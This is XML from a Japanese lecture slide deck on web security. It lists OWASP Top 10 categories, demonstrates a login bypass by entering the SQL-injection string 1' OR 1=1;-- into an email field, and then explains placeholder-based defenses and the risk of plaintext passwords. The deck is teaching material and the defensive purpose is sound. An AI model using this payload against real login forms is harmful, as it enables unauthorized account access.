                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>脆弱で古くなったコンポーネント</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="957067277"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>識別と認証の失敗</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="800166874"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>ソフトウェアとデータの整合性の不具合</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="339258058"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>セキュリティログとモニタリングの失敗</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2172983356"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>サーバサイドリクエストフォージェリ</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="165107069"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直線矢印コネクタ 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21E985A-61E3-6215-5EF9-6EF1ED22BE52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6096000" y="3578087"/>
            <a:ext cx="304733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F8F7FA7-B94D-996C-9C42-ECCBE2B485B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9143337" y="3254921"/>
            <a:ext cx="2739853" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションが主に</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>プログラミング関係</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3901272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21990-F24A-99E9-976F-810F7EC95106}"/>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743F8F6B-3215-20C1-578E-02D7E11FE2D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF759DE-DF07-594E-D9AE-8E291B920B24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6686849" y="2329524"/>
            <a:ext cx="3657798" cy="2885563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="図 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{902ECA47-95A1-49A2-49C5-10A078ADB4D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2329524"/>
            <a:ext cx="5257803" cy="1503995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="テキスト ボックス 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3609EC6-7612-06DD-333B-78F68F160823}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2143662" y="4337418"/>
            <a:ext cx="2646878" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>メールアドレスに</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>1’ OR 1=1;--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>と打ち込む</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="テキスト ボックス 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A47E1A34-1AF4-96C7-7FBE-E5DAEF5F8E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038420" y="5350024"/>
            <a:ext cx="2954655" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>ログインに成功する</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="テキスト ボックス 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B98A8EF6-77E3-72AA-BDB7-0ABF10924265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3551664" y="6105747"/>
            <a:ext cx="8032968" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>※</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン用のデータベースを使っているため前回までの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>アカウントでは</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>　データベースのパスワードがハッシュ化されているためログインできない</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2129766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297D3-228A-CE2B-90A3-C70023A54E67}"/>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F81B3607-3DFB-4BE8-B32D-873EB4B0E5B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン対策</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションは基本的に入力された内容によって</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の構文がプログラム作成者の意図しない動作をすることが原因となる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>そこで入力された内容そのものが文字列となり構文そのものが変わらないようにエスケープ処理をする。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>そこでプレースホルダを用いる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2397491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BCDCFA-543D-2F86-9E35-4E068A4D33FE}"/>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83EE3424-EE7E-1E0C-D214-64B40C5D5F74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BC6D046-9532-8097-6B5C-98660AB488FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2583036" y="2358796"/>
            <a:ext cx="7025928" cy="4002800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="正方形/長方形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B400AE4-53C9-2A14-E003-898848F7D1E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331597" y="3943847"/>
            <a:ext cx="4516340" cy="659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8DB3C6B-CFF6-FFD1-65DD-B37FC8A652F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8197795" y="3943847"/>
            <a:ext cx="2031325" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>プレースホルダを</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>使用する</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2384810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9D1B5E-DC6A-9CE5-54DE-61FAE9454141}"/>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3B85E7D3-119E-8C34-1C19-22794DB3D31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4925032"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>今度は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>1’ OR 1=1; --</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」で検索され</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の構文は変わらなくなる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADCA6409-06B1-C8AA-A0DE-33F1364C9802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="2494021"/>
            <a:ext cx="5141180" cy="1481632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F911366-454A-FAB7-2665-34D7F83F0B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6212621" y="2494021"/>
            <a:ext cx="5200600" cy="1719851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矢印: 右 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6067BC15-382C-D890-A175-5E01F663AB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5565913" y="3490623"/>
            <a:ext cx="1121134" cy="938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認証</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="860398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7AE3F2-3487-695F-BBED-B9111EDF5050}"/>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1B075011-4EEF-BB92-61FC-653D121C2EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="5032375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とパスワードを取り出すだけでは何らかのミスでプレースホルダを使い忘れたときに不正ログインができるし、この手法だとパスワードが平文が前提になる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
